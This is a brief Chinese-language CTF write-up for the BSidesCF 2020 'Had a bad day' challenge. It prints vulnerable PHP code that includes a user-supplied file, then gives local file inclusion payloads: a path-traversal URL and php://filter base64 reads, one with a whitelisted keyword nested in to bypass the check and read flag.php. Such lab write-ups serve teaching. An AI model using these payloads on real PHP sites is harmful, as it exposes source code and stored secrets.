[BSidesCF 2020]Had a bad day
猜测可能有sql注入或者文件包含
尝试了sql注入有报错
确定是文件包含了,并且还在后面连接了一个.php
php://filter/read=convert.base64-encode/resource=index
<?php
$file = $_GET['category'];
if(isset($file))
{
if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){
include ($file . '.php');
}
else{
echo "Sorry, we currently only support woofers and meowers.";
}
}
?>
尝试直接读取/index.php?category=woofers/../flag
说明确实有flag.php这个文件噢
再用filter伪协议独取flag.php文件
这里有个知识点
php伪协议可以嵌套使用
在filter伪协议中,即
php://filter/read=convert.base64-encode/meowers/resource=flag